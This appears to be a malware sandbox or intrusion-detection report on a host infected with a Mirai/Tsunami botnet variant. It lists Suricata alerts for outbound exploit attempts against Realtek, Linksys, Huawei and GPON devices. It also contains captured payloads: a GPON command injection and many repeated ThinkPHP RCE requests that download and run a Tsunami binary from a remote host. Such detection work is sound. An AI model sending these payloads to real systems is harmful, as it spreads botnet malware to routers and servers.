ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.75.162

Timestamp:	192.168.2.2395.100.75.16236528802027121 05/14/22-02:12:01.373649
SID:	2027121
Source Port:	36528
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.226.61.64

Timestamp:	192.168.2.23156.226.61.6434088528692027339 05/14/22-02:12:33.965935
SID:	2027339
Source Port:	34088
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.244.118.33

Timestamp:	192.168.2.23156.244.118.3341258528692027339 05/14/22-02:13:12.911524
SID:	2027339
Source Port:	41258
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.120.26.121

Timestamp:	192.168.2.2395.120.26.12140584802027121 05/14/22-02:12:28.116129
SID:	2027121
Source Port:	40584
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.159.60.130

Timestamp:	192.168.2.2395.159.60.13046212802027121 05/14/22-02:12:21.738119
SID:	2027121
Source Port:	46212
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.144.20.161

Timestamp:	192.168.2.2395.144.20.16144268802027121 05/14/22-02:13:26.124337
SID:	2027121
Source Port:	44268
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.51.213

Timestamp:	192.168.2.2395.100.51.21344342802027121 05/14/22-02:12:36.297626
SID:	2027121
Source Port:	44342
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.3.223

Timestamp:	192.168.2.23172.65.3.22346802555552027153 05/14/22-02:11:51.219645
SID:	2027153
Source Port:	46802
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.154.250.99

Timestamp:	192.168.2.2395.154.250.9959566802027121 05/14/22-02:12:18.483021
SID:	2027121
Source Port:	59566
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.43.202

Timestamp:	192.168.2.23172.65.43.20237380555552027153 05/14/22-02:12:26.237883
SID:	2027153
Source Port:	37380
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.59.51.164

Timestamp:	192.168.2.2395.59.51.16444564802027121 05/14/22-02:12:09.948969
SID:	2027121
Source Port:	44564
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.148.89.35

Timestamp:	192.168.2.23197.148.89.3543430372152835222 05/14/22-02:11:47.945469
SID:	2835222
Source Port:	43430
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.54.193

Timestamp:	192.168.2.23172.65.54.19344722555552027153 05/14/22-02:13:28.810687
SID:	2027153
Source Port:	44722
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.159.46.87

Timestamp:	192.168.2.2395.159.46.8743460802027121 05/14/22-02:11:49.354543
SID:	2027121
Source Port:	43460
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.160.193

Timestamp:	192.168.2.2395.216.160.19341248802027121 05/14/22-02:11:52.570919
SID:	2027121
Source Port:	41248
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.46.10

Timestamp:	192.168.2.23172.65.46.1047160555552027153 05/14/22-02:12:20.938865
SID:	2027153
Source Port:	47160
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.156.55.124

Timestamp:	192.168.2.2395.156.55.12440254802027121 05/14/22-02:12:33.801748
SID:	2027121
Source Port:	40254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.32.101

Timestamp:	192.168.2.23172.65.32.10158782555552027153 05/14/22-02:13:15.170260
SID:	2027153
Source Port:	58782
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.6.218

Timestamp:	192.168.2.2395.100.6.21858038802027121 05/14/22-02:12:07.025093
SID:	2027121
Source Port:	58038
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.247.6.58

Timestamp:	192.168.2.23172.247.6.5849348555552027153 05/14/22-02:13:28.793318
SID:	2027153
Source Port:	49348
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://103.136.43.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
